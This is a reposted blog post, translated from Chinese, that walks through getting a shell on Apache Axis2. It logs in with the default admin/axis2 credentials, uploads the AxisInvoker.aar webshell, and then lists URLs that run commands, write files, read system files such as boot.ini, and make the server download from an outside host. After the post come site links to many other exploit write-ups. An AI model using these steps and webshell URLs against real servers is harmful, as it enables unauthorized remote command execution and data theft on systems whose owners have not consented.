Apache Axis2 background file upload getshell vulnerability recurrence - Code World

Apache Axis2 background file upload getshell vulnerability recurrence

Others 2021-03-21 14:04:10 views: null

0x00 Preface

Apache Axis2 is a W eb services support the core engine. AXIS2 redesigns and rewrites the old AXIS, and provides development versions in two languages, Java and C.

In fact, AXIS2 not only provides a web service interface for WEB applications, but it can also be viewed as a separate server, and it can be easily integrated with Apache Tomcat . Currently, the latest version of AXIS2 is 1.6.2.

Axis is an open source, XML-based Web service architecture. It was originally developed by IBM, called IBM-SOAP. Later, the Apache Foundation launched AXIS on the basis of SOAP. AXIS is essentially a SOAP engine written in Java language. We can use it to operate and interact with each other in various distributed applications.

0x01 Vulnerability recurrence

Default port: 8089

Default background path: /axis2-admin/login

Default account password: admin/axis2

Select Tools-" Upload Service "to upload the aar package for getshell

After success, it will prompt "File AxisInvoker.aar successfully uploaded"

http://xxx.xxx.xxx.xxx/axis2/services/Cat/exec?cmd=ipconfig

0x02 How to use

How to use horses:

支持的命令：
exec-运行命令，在Linux / Windows上均可使用，不用担心。
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/exec?cmd=whoami
 
写-写文件
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/write?path=c:\1.1txt&content=123
 
info-显示某些信息，根据需要进行修改
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/info
 
读取-读取文件内容
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/read?path=c:\boot.ini
 
下载-下载文件并将其保存在某处
 
http://192.168.56.103:8080/axis2/services/AxisInvoker/download?url=http://www.baidu.com&file=c:\122.txt

Download link: https://github.com/CaledoniaProject/AxisInvoker

Please indicate: Adminxe's Blog » Apache Axis2 background file upload getshell vulnerability reproduction

Guess you like

Origin blog.csdn.net/Adminxe/article/details/112265464

Apache Axis2 background file upload getshell vulnerability recurrence

Tongda OA 11.7 background SQL injection getshell vulnerability recurrence

Arbitrary file upload vulnerability mining (getshell)

Glodon Linkworks office OA SQL injection + background file upload vulnerability recurrence (HW0day)

Apache axis2 vulnerability reproducibility

Apache Flink vulnerability recurrence

CVE-2018-2894 weblogic arbitrary file upload vulnerability recurrence

UFIDA KSOA ImageUpload Arbitrary File Upload Vulnerability Recurrence + Exploitation

Hongjing eHR arbitrary file upload vulnerability recurrence (0day)

Vulnerability recurrence - Hongfan OA iorepsavexml.aspx file upload vulnerability (with vulnerability detection script)

Vulnerability recurrence - there is an arbitrary file reading vulnerability in the iDocview doc/upload interface (vulnerability detection script attached)

Vulnerability recurrence - UFIDA NC arbitrary file upload vulnerability (with vulnerability detection script)

[Vulnerability Recurrence] WordPress plugin wp-file-manager arbitrary file upload vulnerability (CVE-2020-25213)

[vulhub vulnerability recurrence] CVE-2018-2894 Weblogic arbitrary file upload vulnerability

[Vulnerability Recurrence] Any file upload vulnerability at the front desk of Dahua Smart Park Integrated Management Platform

[Vulnerability Recurrence] Glodon OA vulnerability collection (information leakage + SQL injection + file upload)

[Vulnerability Recurrence] There is a recurrence of arbitrary file reading vulnerability in Panwei e-office OfficeServer2.php

[Vulnerability Recurrence] Apache Struts2 CVE-2023-50164

Tomcat weak password && background getshell vulnerability

A general-purpose file upload vulnerability getshell in a digital campus system (penetration test-0day)

Getshell | bypass the file upload finishing

Hikvision iVMS integrated security system arbitrary file upload vulnerability recurrence (0day)

File upload vulnerability (File Upload)

Apache Solr component vulnerability recurrence analysis

File upload vulnerability - server detection and bypass 2

Of unsafe file download and upload - upload loopholes - upload rename compete with Apache parsing vulnerability to bypass - and - write file upload double bypass

Vulnerability recurrence - Zhejiang University Ent customer resource management system CustomerAction.entphone; .js interface arbitrary file upload vulnerability (with vulnerability detection script)

Upload File Vulnerability

File upload Parsing Vulnerability

File upload vulnerability

Recommended

The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!

Ranking

Getting the basic concepts of ROS + catkin Profile

Spring Learning (2) --- Assembling Beans in the IoC Container

js to get the src attribute of the image regularly

STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud

Short video learning - 3, pandas simple use of pivot_table

Print directory of project configuration log, output log

Understand the difference between vi and vim in Linux in 3 minutes

1 + x certificate Web front-end development HTML5 special exercises

mangodb save and insert the difference

7-1 Family tree processing (50 points) (binary tree solution)

Daily

More

2024-05-13(8)

2024-05-12(28)

2024-05-11(32)

2024-05-10(34)

2024-05-09(32)

2024-05-08(18)

2024-05-07(34)

2024-05-06(6)

2024-05-05(0)

2024-05-04(18)